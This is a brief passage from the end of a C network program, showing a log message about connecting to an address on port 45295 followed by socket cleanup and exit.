 fprintf(stderr, "[%s] Connecting to %d.%d.%d.%d:45295.n",
 inet_ntoa(saddr_in2.sin_addr), ip1, ip2, ip3, ip4);
 }

 close(sock_server_new);
 exit(0);
 }

 close(sock_server_new);
 }

 return 0;
}

/* EOF */